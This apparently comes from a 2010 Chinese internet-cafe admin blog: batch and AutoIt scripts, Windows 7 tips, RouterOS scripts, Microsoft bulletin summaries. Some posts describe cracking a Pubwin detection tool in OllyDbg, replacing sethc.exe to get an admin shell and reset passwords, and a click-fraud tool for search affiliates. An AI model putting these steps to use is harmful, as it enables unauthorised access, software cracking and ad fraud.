      首先下载Radmin Viewer3.2，再把这程序解压到Radmin Viewer3.2目录下。其中“中介连接”指的是通过中介服务器连接到另一台装有Radmin的机器，例如：
      局域网内有2台装有Radmin的计算机，但只映射了其中一台到外网，这样就可以通过这台计算机作为中介服务器连接到另一个未作端口映射的计算机了。

软件说明：
1、核心为GuiListView.au3的详细应用，包括列表控件的添加、删除、图像处理等等。
2、与天下网吧那个软件相比较，缺少很明显——速度过于慢了。

点击下载此文件
 点击下载源程序
 小汤完善版

比较文本批处理

180045@163.com(毒药) — Sat,10 Apr 2010 08:17:43 +0800
用途？HOSTS表、关键字等等。

复制内容到剪贴板程序代码
@echo off
title  比较文本批处理  %date%
mode con: cols=50 lines=10
color 1f
echo.
echo                      文件对比
echo.
echo               1、过滤文本重复行
echo               2、提取文本重复行
echo               3、比较文本提取重复行
echo               4、比较文本提取不重复
echo.
echo.
set /p wo=(Q退出)请正确选择:
::过滤
if %wo% equ n (goto :q) else (if %wo% gtr 4 (%0) else (if %wo% lss 1 %0))
if %wo% ==1 goto :1
if %wo% ==2 goto :2
if %wo% ==3 goto :3
if %wo% ==4 goto :4
goto :eof
:1
cls
echo                  过滤文本重复行
echo.
set /p wb=请输入要处理的[路径]文本:
set /p wb1=请输入处理后生成的[路径]文本:
for /f "delims=" %%i in (%wb%) do (
    if not defined %%i set %%i=A &  echo %%i>>%wb1%
)
echo                    处理完成
ping /n 2 127.0.1 >nul
goto :eof
:2
cls
setlocal enabledelayedexpansion
echo                  提取文本重复行
echo.
set /p wb=请输入要处理的[路径]文本:
set /p wb1=请输入处理后生成的[路径]文本:
for /f "delims=" %%a in ('sort  %wb%') do (
if %%a equ !b! echo %%a>>%wb1%
set b=%%a)
echo                    处理完成
ping /n 2 127.0.1 >nul
goto :eof
:3
cls
echo                  比较文本提取重复行
echo,
echo  (如有:1.txt 2.txt  提取1.txt在2.txt里出现的行)
echo.
set /p wb1=请输入要处理的[路径]文本1:
set /p wb2=请输入要处理的[路径]文本2:
set /p wb3=请输入处理后生成的[路径]文本:
for /f "delims=" %%c in (%wb1%) do (
findstr "%%c" %wb2%>nul &&echo %%c>>%wb3%)
echo                    处理完成
ping /n 2 127.0.1 >nul
goto :eof
:4
cls
echo                  比较文本提取不重复
echo,
echo  (如有:1.txt 2.txt  提取1.txt在2.txt里没有的行)
echo.
set /p wb1=请输入要处理的[路径]文本1:
set /p wb2=请输入要处理的[路径]文本2:
set /p wb3=请输入处理后生成的[路径]文本:
for /f "delims=" %%c in (%wb1%) do (
findstr "%%c" %wb2%>nul ||echo %%c>>%wb3%)
echo                    处理完成
ping /n 2 127.0.1 >nul
goto :eof
:q
goto :eof

Radmin自动填密码工具

180045@163.com(毒药) — Fri,09 Apr 2010 11:43:16 +0800
软件说明：
保存网吧维护公司或者团队维护的网吧服务器的Radmin的用户名和密码，并可以自动填密码并连接Radmin的被控机器。去掉烦琐的输密码操作。
特点：
支持Radmin2.X版本及3.X版本。
自带了简体中文版的Radmin Viewer 3.2版本。

特别注意：注意保管好文件，建议配置好后做成自解压文件并加上密码。每次在非工作机上使用后删除程序目录。防止程序包被人盗用。如有发现被人盗用，赶紧修改Radmin被控端的密码。

图片:

点击下载此文件

Microsoft 安全公告摘要（2010 年 3 月）

180045@163.com(毒药) — Fri,09 Apr 2010 09:28:18 +0800
2010 年 3 月安全公告包含以下 3 个安全漏洞：

严重等级 1 个
1.Internet Explorer 的累积性安全更新 (980182)
http://www.microsoft.com/china/technet/security/bulletin/ms10-018.mspx

重要等级 2 个

1.Windows Movie Maker 中的漏洞可能允许远程执行代码 (975561)
http://www.microsoft.com/china/technet/security/bulletin/ms10-016.mspx

2.Microsoft Office Excel 中的漏洞可能允许远程执行代码 (980150)
http://www.microsoft.com/china/technet/security/bulletin/ms10-017.mspx

WIN7技巧集

180045@163.com(毒药) — Fri,09 Apr 2010 08:39:41 +0800
1、一个适合清理win7系统垃圾文件的批处理

复制内容到剪贴板程序代码

@echo off
color 0a
title 清理win7系统垃圾
echo 清理垃圾文件，速度由电脑文件大小而定。在没看到结尾信息时
echo 请勿关闭本窗口。
echo 正在清除系统垃圾文件，请稍后......
echo 删除补丁备份目录
RD %windir%\$hf_mig$ /Q /S
echo 把补丁卸载文件夹的名字保存成2950800.txt
dir %windir%\$NtUninstall* /a:d /b >%windir%\2950800.txt
echo 从2950800.txt中读取文件夹列表并且删除文件夹
for /f %%i in (%windir%\2950800.txt) do rd %windir%\%%i /s /q
echo 删除2950800.txt
del %windir%\2950800.txt /f /q
echo 删除补丁安装记录内容（下面的del /f /s /q %systemdrive%\*.log已经包含删除此类文件）
del %windir%\KB*.log /f /q
echo 删除系统盘目录下临时文件
del /f /s /q %systemdrive%\*.tmp
echo 删除系统盘目录下临时文件
del /f /s /q %systemdrive%\*._mp
echo 删除系统盘目录下日志文件
del /f /s /q %systemdrive%\*.log
echo 删除系统盘目录下GID文件(属于临时文件，具体作用不详)
del /f /s /q %systemdrive%\*.gid
echo 删除系统目录下scandisk（磁盘扫描）留下的无用文件
del /f /s /q %systemdrive%\*.chk
echo 删除系统目录下old文件
del /f /s /q %systemdrive%\*.old
echo 删除回收站的无用文件
del /f /s /q %systemdrive%\recycled\*.*
echo 删除系统目录下备份文件
del /f /s /q %windir%\*.bak
echo 删除应用程序临时文件
del /f /s /q %windir%\prefetch\*.*
echo 删除系统维护等操作产生的临时文件
rd /s /q %windir%\temp md %windir%\temp
echo 删除当前用户的COOKIE（IE）
del /f /q %userprofile%\cookies\*.*
echo 删除internet临时文件
del /f /s /q "%userprofile%\local settings\temporary internet files\*.*"
echo 删除当前用户日常操作临时文件
del /f /s /q "%userprofile%\local settings\temp\*.*"
echo 删除访问记录（开始菜单中的文档里面的东西）
del /f /s /q "%userprofile%\recent\*.*"
echo
echo 清除系统垃圾文件批处理系统，执行完毕。谢谢使用。
echo 转载请保留本信息,谢谢
echo
echo. pause

2、去掉win7快捷方式小箭头的正确方法

错误方法1：

通过删除注册表
HKEY_CLASSES_ROOT\lnkfile
HKEY_CLASSES_ROOT\piffile
下的IsShortcut去掉快捷方式的箭头。
这种方法虽然可以去除小箭头，但有后遗症：不能用超级任务栏、开始菜单游戏打不开、右键“计算机”管理打不开...

错误方法2：

修改注册表
复制内容到剪贴板程序代码
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\explorer\Shell Icons]
"29"="C:\\Windows\\System32\\shell32.dll,50"

用系统默认的透明图标覆盖掉小箭头。
这种方法当时有效，但第二天你就会发现桌面所有快捷方式都多了一个小黑块

至于优化大师，由于本人一直喜欢手动优化，因此没用过这个软件也就不作评论了

正确的方法是：

找一透明ico图标（见附件），保存到C:\windows文件夹中，文件名为Empty.ico
新建一文本文档，粘贴以下内容，另存为扩展名reg的注册表文件，双击导入，注销后重新登录即可(Vista同样适用）
此方法操作简单、见效快、无任何毒副作用、去掉后不反弹...
复制内容到剪贴板程序代码

Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons]
"29"="C:\\Windows\\Empty.ico,0"

为方便操作，附件中提供了透明ico图标及去掉和恢复快捷方式箭头的注册表文件

郑重声明：此贴由网友why6158 发布在远景论坛附件下载收费，转载请注明出处，尊重原创作者。

点击下载此文件

3、Windows 7快捷键及鼠标动作大全

* 窗口快捷键
win+↑ 最大化窗口
win+↓ 还原/最小化窗口
win+← 使窗口占领左侧的一半屏幕
win+→ 使窗口占领右侧的一半屏幕
win+shift+← 使窗口在左边的显示器显示
win+shift+→ 使窗口在右边的显示器显示
win+home 还原/最小化所有的其他窗口

* 任务栏快捷键
win+T 预览第一个任务栏项，按住win键连续按T从左向右预览
win+shift+T 预览最后一个任务栏项，按住win+shift键连续按T从右向左预览
松开以后，也可以按←或→键来按顺序预览。
win+数字键1~9 启动当前钉在任务栏上的快速启动项，按win+1启动左起第一个快捷方式，依次类推。

* 桌面快捷键
win+空格键预览桌面（不同于显示桌面，松开以后会恢复原状。）
win+G 按排列次序把桌面小工具送到屏幕最前端
win+P 切换连接到投影仪的方式
win+X 打开windows移动中心

* 辅助工具快捷键
win+加号“+” 按比例放大整个屏幕
win+减号“-” 按比例缩小整个屏幕

* 资源管理器快捷键
Alt+P 快速打开/关闭预览窗格

* 鼠标动作
Shift+左键单击任务栏图标打开一个新的实例（例如Shift+左键单击“库”图标会打开一个新的资源管理器窗口）
鼠标中键单击任务栏图标作用同上。
Ctrl+Shift+左键单击任务栏图标以管理员权限打开一个新的实例
Shift+右键单击任务栏图标打开像XP/Vista那样的窗口控制菜单（即最大化，最小化，关闭等）；对于未打开的快捷方式，则弹出针对快捷方式的右键菜单。
shift+右键单击任务栏分组打开像XP/Vista那样的窗口控制菜单（即最大化组，最小化组，关闭组）
ctrl+在任务栏分组上滚动滚轮在本组中的不同窗口/标签之间切换。

4、显示快速启动栏

Windows7 默认不显示快速启动栏，用下面的方法就可以找回快速启动栏了。在任务栏上右键，选择工具栏，新建工具栏，在弹出的对话框中输入：%userprofile%\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch，这时会弹出路径不存在的提示，不用管它，点击确定，然后就会出现一个名为“Quick Launch”的文件夹，选中然后点击“选择文件夹”即可完成操作。

5、让库显示“我的电脑”

在默认情况下，任务栏上会有一个“库”按钮，打开之后会进入系统的“库”文件夹，如果你不常用“库”功能，可以将这个按钮设置为打开直接进入“计算机”。
右键点击“库”按钮，再右键点击“Windows资源管理器”，选择“属性”，目标（T）一栏中的数值为：%windir%explorer.exe，我只需要在这一串数字后面加上一个空格和逗号即可，点击确定完成修改。

6、右键添加[管理员取得所有权]

复制内容到剪贴板程序代码

Windows Registry Editor Version 5.00

[HKEY_CLASSES_ROOT\*\shell\runas]
@="管理员取得所有权"
"NoWorkingDirectory"=""

[HKEY_CLASSES_ROOT\*\shell\runas\command]
@="cmd.exe /c takeown /f \"%1\" & icacls \"%1\" /grant administrators:F"
"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" & icacls \"%1\" /grant administrators:F"

[HKEY_CLASSES_ROOT\exefile\shell\runas2]
@="管理员取得所有权"
"NoWorkingDirectory"=""

[HKEY_CLASSES_ROOT\exefile\shell\runas2\command]
@="cmd.exe /c takeown /f \"%1\" & icacls \"%1\" /grant administrators:F"
"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" & icacls \"%1\" /grant administrators:F"

[HKEY_CLASSES_ROOT\Directory\shell\runas]
@="管理员取得所有权"
"NoWorkingDirectory"=""

[HKEY_CLASSES_ROOT\Directory\shell\runas\command]
@="cmd.exe /c takeown /f \"%1\" /r /d y & icacls \"%1\" /grant administrators:F /t"
"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" /r /d y & icacls \"%1\" /grant administrators:F /t"

7、Windows 7下QQ消息提醒播放器声音变小解决方法

在Windows 7下实际使用过程中遇到的问题，只要QQ开着有消息提示，而同时你在听歌或者看电影那么播放器的声音立马就小了下去。
实际上这是Windows 7的一个新的功能设计，用意就是避免用户太沉浸于音乐或电影当中而忽略了其他信息。用户对这个比较人性化的设计褒贬不一，如果不需要，我们可以通过设置，把这项功能去掉。

设置方法：

鼠标右键单击系统托盘上的喇叭图标，弹出菜单中选择“ 声音(Sound)”，打开“声音”窗口，切换到“通信”标签(Communications)，打开下拉框，将“当Windows检测到通信活动时”设置为“不执行任何操作”。

这样就成功的去掉了这项功能，以后QQ来消息就不会影响播放器的声音了。

WIN7显示器驱动停止响应另类解决方案

180045@163.com(毒药) — Wed,24 Mar 2010 04:13:24 +0800
      对VISTA深恶痛绝的我在满天WIN7王道的吹捧之下，闲的无聊也装上了。只是装了后发觉1G内存确实是少了点，于是乎又搞了一条1G上去，可是~传说中的显示器驱动停止响应BUG也不合时宜的跳了出来——每次开机总是要停止响应一次，需则不影响使用，但~黑屏那么的两三秒，不爽！

    上网问了一下百度大神，找到的无非是更新驱动之类的方案，根本扯不上边。最后只好按排除法再拿了一条2G分别换上，步骤如下：

    1、单条1G DDR2 800，无故障
    2、单条1G DDR2 667，无故障
    3、667与800设双通道，停止响应
    4、单条2G DDR2 800，停止响应
    5、2GDDR2 800与1G DD2 667无双通道，无故障

    显然的内存兼容性问题，只是当单条2G DDR2 800插上的时候也是停止响应~这个~那个~！

关于易游破坏分区表病毒的解决方案

180045@163.com(毒药) — Wed,17 Mar 2010 18:59:22 +0800
      等待了一个星期多的时间，易游终于拿出了升级文件，这次的MBR病毒不可不说是对易游的一次考验，好在这病毒还没有大规模的爆发，也算是过关了吧。

for2008     - 2008现有版本
forEyooWAN  - 整合版

1、将drivercontrol.dll文件复制到服务器的NEWMENU目录
2、管理端重建CRC （操作帮助：http://help.stnts.com/html/200907/53.html）
3、工作站重启两次，保护核心应升级为
    2008     --- 5.0.17.0
    EYOOWAN  --- 6.0.1.0

点击下载此文件

另附318版本防破解补丁：

点击下载此文件

Microsoft 安全公告摘要（2010 年 2 月）

180045@163.com(毒药) — Thu,11 Feb 2010 08:38:11 +0800
      微软今天凌晨发布了2010年2月的月度安全补丁，数量达13个，追平了去年10月刚刚创下的最高纪录，而上个月只有一个安全补丁(上月底还有IE高危漏洞紧急补丁)。

      本次的13个补丁按最高危险等级来说有5个严重级、7个重要级和1个中等级，修复了20多个各种类型的安全漏洞，波及范围也相当广泛。

      注意：以下提及受影响操作系统时如无特别说明均同时包含32/64位版本。

1、安全公告编号：MS10-003

知识库编号：KB978214

公告摘要：解决Office中秘密报告的漏洞。如果用户打开特制的Office文件，该漏洞可能允许远程执行代码。成功利用此漏洞的攻击者可以完全控制受影响的系统。

此更新通过修改Office打开文件的方式来解决该漏洞。

最高危险等级：严重

影响范围：Office XP SP3、Office 2004 for Mac

2、安全公告编号：MS10-004

知识库编号：KB975416

公告摘要：解决Office PowerPoint中六个秘密报告的漏洞。如果用户打开特制的PowerPoint文件，这些漏洞可能允许远程执行代码。

通过更改Office PowerPoint和PowerPoint Viewer分析特制PowerPoint文件的方法，此安全更新解决了漏洞。

最高危险等级：严重

影响范围：Office XP SP3、Office 2003 SP3、Office 2004 for Mac

3、安全公告编号：MS10-005

知识库编号：KB978706

公告摘要：解决画图程序中一个秘密报告的漏洞。如果用户使用画图查看特制JPEG图像文件，则该漏洞可能允许远程执行代码。

通过修改画图解码JPEG图像文件的方法，此安全更新解决了漏洞。

最高危险等级：中等

影响范围：Windows 2000 SP4、Windows XP SP3、Windows Server 2003 SP2

4、安全公告编号：MS10-006

知识库编号：KB978251

公告摘要：解决Windows中两个秘密报告的漏洞。如果攻击者将特制的SMB响应发送到客户端发起的SMB请求，此漏洞可能允许远程执行代码。要利用这些漏洞，攻击者必须诱使用户建立与恶意SMB服务器的SMB连接。

该安全更新通过更正SMB客户端验证响应的方式来解决该漏洞。

最高危险等级：严重

影响范围：从Windows 2000 SP4到Windows Server 2008 R2

数据被恢复，心情很郁闷

180045@163.com(毒药) — Thu,11 Feb 2010 02:53:50 +0800
        昨天下午空间开始访问错误，老是要刷新多几次才能打开，有时干脆就service unavailable。
     太阳加月亮哦~偶滴神！
     以下猜测：
1、空间并发链接器不足，没可能。
2、IIS应用程序资源不足，不是我的IIS不是我作主。
3、被挂马，虚拟主机安全不足或跨站或PJ漏洞。
     猜来猜去懒的想，一窝脑儿把前阵子的备份直接覆盖掉，只是一个不小心把备份后写的文章上传的图片和附件都删了，吗的！

     “被”X了，恢复文章中。

解决易游E盘文件夹不能清空问题

180045@163.com(毒药) — Tue,09 Feb 2010 03:22:28 +0800
      刚才在易游论坛上逛了下，发现原来易游那个开机清空E盘也不是那么的完美啊，新建一个文件夹再设置权限就不能删除了，政策上又要保存IE记录——呵呵，易游太马虎了吧。
      研究了一下批处理，搞了出来(已更改)：


复制内容到剪贴板程序代码
@echo off
Echo y| cacls e: /t /p everyone:f
for /f "delims=" %%a in ('dir E: /ad/b') do  Echo y| cacls e:\%%a /t /p everyone:f

      把这个放在开机批处理好了，再次BS易游。


WINPCAP的AU3运用

180045@163.com(毒药) — Mon,08 Feb 2010 23:36:24 +0800
      这几天在寻思着用AU3做一个PUBWIN非法检测软件的时候，无意中找到了关于WINPCAP的UDF，呵呵，试了一下很强悍，当中包含了捕获、发包、收包等函数，看下Demo就知道了。

其中过滤器的语法在http://blog.csdn.net/lastsweetop/archive/2009/04/14/4073911.aspx中有介绍。如src 、dst、prot等等，应该不会难懂吧。

      再说回那个PUWBIN非法检测，我发觉用AU3来做效率真的是太低了。实现未计费机子这个容易，利用IE的UDF的_IEGetObjByName返回一个集合就行了，只是在利用WINPACP检测机子的连通状态这个过程，因为我不懂怎么用AU3去编写一个发包函数，只能用PING命令检测后返回的数据包作判定，而且这个判断有时候又会出错，不知道怎么回事了。

     对此，某些时候有点动摇想用回VB了。


==================================
     闲聊几句说下思路：
1、登陆后台，获取没计费的机器列表，Pubwin后台的视图有几种状态：锁定、上机（内容为卡号）、空（NULL）和挂机，我们只需要获取状态不为数字的机器就行了。
2、返回列表后，这里有很多种方法检测列表机器的开机状态，不过最实际的还是用WINPCAP，因为常用PING命令不旦速度慢，对于开了防PING的机子也是无法知道。
3、显示非法机器，太哆嗦则个。

Winpacp.au3下载

AU3音乐键盘

180045@163.com(毒药) — Fri,05 Feb 2010 07:10:45 +0800
      这个比FLASH版的好玩多了。

复制内容到剪贴板程序代码

#NoTrayIcon
#include
#include
HotKeySet("^!{F3}", "myexit")
Global $f3,$hHook,$h_KeyProc,$open
myhook()
;;;;;;;;;;;hook键盘
Func myhook()
    Local $hmod
    $open = _midiOutOpen()
    $h_KeyProc = DllCallbackRegister("Proc", "long", "int;wparam;lparam")
    $hmod = _WinAPI_GetModuleHandle(0)
    $hHook = _WinAPI_SetWindowsHookEx($WH_KEYBOARD_LL, DllCallbackGetPtr($h_KeyProc), $hmod)
    While 1
        Sleep(10)
    WEnd
EndFunc
Func Proc($nCode, $wParam, $lParam)
    Local $tKEYHOOKS
    $tKEYHOOKS = DllStructCreate($tagKBDLLHOOKSTRUCT, $lParam)
    If $nCode < 0 Then
        Return _WinAPI_CallNextHookEx($hHook, $nCode, $wParam, $lParam)
    EndIf
    If $wParam = $WM_KEYDOWN Then
        _MidiOutShortMsg($open, 0x00403A90+(DllStructGetData($tKEYHOOKS, "vkCode")-65)*256)
    Else
        Local $flags = DllStructGetData($tKEYHOOKS, "flags")
        Switch $flags
            Case $LLKHF_ALTDOWN
                _MidiOutShortMsg($open, 0x00403A90+(DllStructGetData($tKEYHOOKS, "vkCode")-65)*256)
        EndSwitch
    EndIf
    Return _WinAPI_CallNextHookEx($hHook, $nCode, $wParam, $lParam)
EndFunc
;;;;;;;;;;;;;;;;midi播放api
Func _midiOutGetNumDevs();设备数量
    $ret = Dllcall("winmm.dll","long","midiOutGetNumDevs")
    if not @error then Return $ret[0]
EndFunc
Func _midiOutOpen($devid=0,$callback=0,$instance=0,$flags=0);打开设备

    $struct = DllStructCreate("udword")

    $ret = Dllcall("winmm.dll","long","midiOutOpen","ptr",DllStructGetPtr($struct),"int",$devid,"long",$callback,"long",$instance,"long",$flags)
     if not @error Then
          $Get = Dllstructgetdata($struct,1)
          Return $get
          else
           Return $ret[0]
      EndIf
EndFunc
Func _MidiOutClose($hmidiout);关闭设备
    $ret = Dllcall("winmm.dll","long","midiOutClose","long",$hmidiout)
   if not @error Then Return $ret[0]
   EndFunc

Func _MidiOutShortMsg($hmidiout,$msg);播放 midiOutShortMsg(midiout, &H90 + ((flip) * &H100) + (volume * &H10000) + channel)
    $ret = Dllcall("winmm.dll","long","midiOutShortMsg","long",$Hmidiout,"long",$msg)
    if not @error Then Return $ret[0]
EndFunc
;;;;;;;;;退出
Func myexit()
        _MidiOutClose($open)
        _WinAPI_UnhookWindowsHookEx($hHook)
        DllCallbackFree($h_KeyProc)

    Exit
EndFunc

快速关机重启函数

180045@163.com(毒药) — Fri,05 Feb 2010 07:06:35 +0800

复制内容到剪贴板程序代码

关机：
_WinAPI_NtShutdownSystem(2)

重启：
_WinAPI_NtShutdownSystem(1)

Func _WinAPI_NtShutdownSystem($flags)
    DllCall("ntdll.dll","int","RtlAdjustPrivilege","long",0x13,"int",True,"int",False,"ptr",DllStructGetPtr(DllStructCreate("int 0")))
    DllCall("ntdll.dll","int","NtShutdownSystem","int",$flags)
EndFunc

本是同根生；相煎何太急

180045@163.com(毒药) — Fri,05 Feb 2010 07:00:10 +0800
      这个星期以来，360与瑞星的骂战已提升到对簿公堂的级别，我等鱼虾小民各站一边，此外还有N多枪手扔闪光弹，一个不留神，闪着了~真雷啊！

奇虎360为何极力掩盖给用户开“后门”的真相

 请奇虎360停止愚弄用户立即停止安装“后门”

360本地提权后门漏洞详细分析报告

 360声明：360杀毒超越对手成市场第一遭瑞星“后门”诽谤

 瑞星杀毒软件曝出高危漏洞 360紧急提供临时补丁

 523万瑞星用户已下载360临时补丁 360拦截数十万次攻击

      看罢以来新闻，不知道是可悲抑或可笑，自08年开始360与瑞星就已经开始打着口水仗了，但在“你死我活”的残酷竞争背后，总是充斥着尔虞我诈的纷争。
      淡定~爱者恒信，不爱者恒不信，偶用卡巴的，路过！

破解PUBWIN非法检测工具(流星无语)过程中的发现

180045@163.com(毒药) — Fri,05 Feb 2010 06:05:01 +0800
      PUBWIN被破解一直以来都是很头痛的事，一开始我是用那个网吧逃费检查官来防止破解，但换了PUBWIN2009后老是觉得软件开始不好使了，很多时候非法都检测不出来，所以~没办法就换！
      上网找下这个网吧守护神的破解资料，最后在柳如悲风的博客里找到了方法，二话不说，又一个菜鸟学破解：

1、查壳——无。

2、OD载入，下断点GetPrivateProfileStringA，F9运行到断点自动停止。

3、F7进入到这个CALL，再F8步进会发现程序在慢慢的（因为我按的很慢，哈哈）读取SET.INI配置文件，给点耐心慢慢看，你会发现pubwin的后台明文密码就在堆栈中（32位密文是存放于SET.INI文件中）。

4、再继续F8步进，找到关键CALL后下断点（这个多试几次就知道了），重新载入运行；

5、到了上图所示的地址后就直接F7进入吧，还是F8，下图所示第一行里，sete bl 改为 setne bl，保存后退出。

     运行修改过的文件，你会发现那个烦人的注册框已经消失了，爽了吧。

    注：本文所说的只是一个发现，并不提倡破解。
    ========================================
      嗯，有些密码还是不知道的好~我已经忘记了，你呢？
   ========================================
      今晚玩了下0606版的，原理也一样。

杀死Pubwin随机广告进程(AU3+批处理)

180045@163.com(毒药) — Thu,04 Feb 2010 02:02:02 +0800
     用惯了AU3，见到这个批处理后不自然的就转成了AU3，呵~顺手了。

批处理
复制内容到剪贴板程序代码

cd /d "c:\pubwin广告目录"    ;定位到PUBWIN广告程序的目录
for /f "delims=*" %%i in ('dir /b *.exe') do taskkill /f /im %%i    ;循环杀死目录中后缀为EXE的进程

AU3

复制内容到剪贴板程序代码
FileChangeDir ( "c:\pubwin广告目录" )
$search = FileFindFirstFile("*.exe")

; 检查搜索是否成功
If $search = -1 Then
    Exit
EndIf

While 1
    $file = FileFindNextFile($search)
    If @error Then ExitLoop
        ProcessClose($file)
WEnd
; 关闭搜索句柄
FileClose($search)

常用ROS脚本——持续收集ING

180045@163.com(毒药) — Wed,03 Feb 2010 23:01:35 +0800
1、ROS 批量绑定ARP脚本
ROS2.9.27
复制内容到剪贴板程序代码
:foreach i in [/ip arp find dynamic yes ] do={/ip arp add copy-from $i}

ROS2.9.6
复制内容到剪贴板程序代码
:foreach i in [/ip arp find dynamic=yes ] do={/ip arp add copy-from=$i}

2、智能PCQ限速
复制内容到剪贴板程序代码

#得到用户数量
/ip fir fil
add chain=forward src-address=192.168.0.0/24 action=add-src-to-address-list \
    address-list=pcq_list address-list-timeout=5s comment="pcq_list_add" \

#//***********************************Queue Type
/que typ
add name="pqc_http_down" kind=pcq pcq-rate=824000 pcq-limit=50 \
    pcq-classifier=dst-address pcq-total-limit=200000
add name="pcq_up" kind=pcq pcq-rate=284000 pcq-limit=50 \
    pcq-classifier=src-address pcq-total-limit=20000

#//***************************************in Simple Quueu
/que sim
#取消对网关的限制#
add name="admin" target-addresses=192.168.0.0/24 dst-address=192.168.0.0/24 \
    interface=all parent=none direction=both priority=1 queue=default/default \
    limit-at=0/0 max-limit=0/0 total-queue=default disabled=no
#PCQ分配#
add name="pcq" target-addresses=192.168.0.0/24 dst-address=0.0.0.0/0 \
    interface=LAN parent=none direction=both priority=8 \ #LAN名称,我的是LAN
    queue=pcq_up/pqc_http_down limit-at=0/0 max-limit=384000/1000000 \
    burst-limit=384000/1000000 burst-threshold=64000/256000 burst-time=3s/3s \
    total-queue=default-small disabled=no

#//******************************脚本，每2秒run1次
:set maxdown 1024000
:set maxup 384000
#最小带宽
:set mindown 120000
:set minup 80000
#保留带宽
:set resDown 200000
:set resUp 100000
#因子，根据带宽定
:set yz 500
:set pcqitem [:len [/ip firewall address-list find list=pcq_list]]
:if ($pcqitem!=0) do={
:set pcqdown [/queue type get [/queue type find name=pqc_http_down] pcq-rate]
:set pcqdownold $pcqdown
:set pcqup [/queue type get [/queue type find name=pcq_up] pcq-rate]
:set pcqupold $pcqup
#:set pcqdown ($maxdown/$pcqitem)
#:set pcqup ($maxup/$pcqitem)
:set curDown 1
:set curUp 1
/int mon PPPOE once do={:set curDown $received-bits-per-second}  #WAN 名称,我的是PPPOE
/int mon PPPOE once do={:set curUp $sent-bits-per-second}
:set testdown ($maxdown+-$curDown+-$resDown)
:if ($testdown>0) do={
:set pcqdown ($pcqdown+($testdown/$yz))
}
:if ($testdown<=0) do={
:set pcqdown ($pcqdown+$testdown)
}
:set a ($maxdown+-$resDown)
:if ($pcqdown>$a) do={:set pcqdown $a}
:set a ($maxdown/$pcqitem)
:if ($pcqdown<$a) do={:set pcqdown $a}
:set testup ($maxup+-$curUp+-$resUp)
:if ($testup>0) do={
:set pcqup ($pcqup+($testup/$yz))
}
:if ($testup<=0) do={
:set pcqup ($pcqup+$testup)
}
:set a ($maxup+-$resUp)
:if ($pcqup>$a) do={:set pcqup $a}
:set a ($maxup/$pcqitem)
:if ($pcqup<$a) do={:set pcqup $a}
:if ($pcqdown!=$pcqdownold) do={
:if ($pcqdown>$mindown) do={/queue type set [/queue type find name=pqc_http_down] pcq-rate=$pcqdown;} else={/queue type set [/queue type find

name=pqc_http_down] pcq-rate=$mindown;}
}
:if ($pcqup!=$pcqupold) do={
:if ($pcqup>$minup) do={/queue type set [/queue type find name=pcq_up] pcq-rate=$pcqup;} else={/queue type set [/queue type find name=pcq_up]

pcq-rate=$minup;}
}
}

#////
#优点：可以最大化网络
#缺点：不是程序级别，反应比较慢，通常由1-2秒的延时

3、Ros强开指定首页，类似电信的ADSL强开指定首页，即push功能
复制内容到剪贴板程序代码

######程序开始######################################################################
# 程序名称:ROS强开首页(类似电信ADSL强开指定首页)
# 程序版本:测试
# 程序员:kuwin Email:kuwin@163.com
# 程序版权:免费软件(本程序可自由传播及修改,不必理会原创作者kuwin)
#  Ros版本:Ros2.9.27
# 编写日期:2007-10-17
# 修改日期:2007-10-17
# 测试人员:kuwin
# 程序评级:无
# 安装说明:
#     1.本程序只在Ros2.9.27上调试通过,其它版本尚未测试;
#     2.安装前请做好备份,一切后果与kuwin无关;
#     2.Winbox->System->Scripts->按+,贴入程序内容,按OK,再按Run Script.
####################################################################################
#定义变量
#首页所在服务器IP
:local StrToAddress
:set StrToAddress 192.168.0.1

#首页所在服务器端口
:local StrToPort
:set StrToPort 80

#时限1,指定时限内跳到指定首页,设置1-5秒
:local StrTimeOut1
:set StrTimeOut1 2s

#时限2,指定时限内不跳到指定首页,3小时为3h,(测试是否有效可调为1分钟1m)
:local StrTimeOut2
:set StrTimeOut2 3h

ip firewall mangle add chain=prerouting protocol=tcp dst-port=80 src-address-list=!src2 \
        action=add-src-to-address-list address-list=src1 address-list-timeout=$StrTimeOut1 comment=TimeOut1

ip firewall mangle add chain=prerouting protocol=tcp dst-port=80 \
        action=add-src-to-address-list address-list=src2 address-list-timeout=$StrTimeOut2 comment=TimeOut2

ip firewall nat add chain=dstnat protocol=tcp dst-port=80 src-address-list=src1 \
        action=dst-nat to-addresses=$StrToAddress to-ports=$StrToPort comment=ToAddress
######程序结束######################################################################

用粘滞键破解XP/2003密码

180045@163.com(毒药) — Wed,03 Feb 2010 22:42:48 +0800
   今天看到这个文章，印证了一个道理：思想永远走在技术的前沿。

   Windows的粘滞键。是按5下shift后，windows就执行了system32下的sethc.exe

   想办法进入纯DOS下，进入C盘，如果是NTFS格式的还要在DOS能读NTFS。

   将SYSTEM32下的SETHC.EXE改名或删除。

   将CMD.EXE改名成SETHC.EXE放到SYSTEM32下。

   然后重启到登录界面，按五下左SHIFT键，出来的就是CMD.EXE窗口。

   此SHELL是管理员权限，能改管理员密码。

   然后么你就可以NET USER ADMINISTRATOR 密码了。

测试XP SP3和2003 SP2成功。
如下图：

网吧主页联盟增值作弊软件(兼容大部分增值主页搜索)

180045@163.com(毒药) — Wed,03 Feb 2010 08:31:22 +0800
      自从2009年以来，众多网吧增值联盟如雨后春笋地冒了出来，一时间眼花缭乱。不过能数出来的也就那么的几家做的比较大型，基本上也就是集中在搜狗搜索与谷歌搜索，至于百度大联盟，也不是一般人能拿到的。

      这个软件的用途也就不用说了，不过封了号可不要找我。

      改进功能：抛弃更改MAC，增加了关键字更新，在百度和搜狗中获取最新关键字，并过滤重复关键字（实用）。

      PS：再次改动了一下，对这软件也没有什么想法了，那天网友“如果有一天~ ”告诉我关闭时间太快会导致无效搜索，把关闭时间增加到10秒后，搜索量果然就上来了。于是乎~更新吧，在这多谢“如果有一天~ ”的白老鼠精神。

[有人说软件存在木马，这是由AU3脚本语言编成，部分杀毒软件会报毒，请自行斟酌。]
软件简介：

===================================
软件版本：1.0.1.0
软件语言：简体中文
软件大小：388 KB
软件授权：免费软件
运行环境：2000/XP/2003
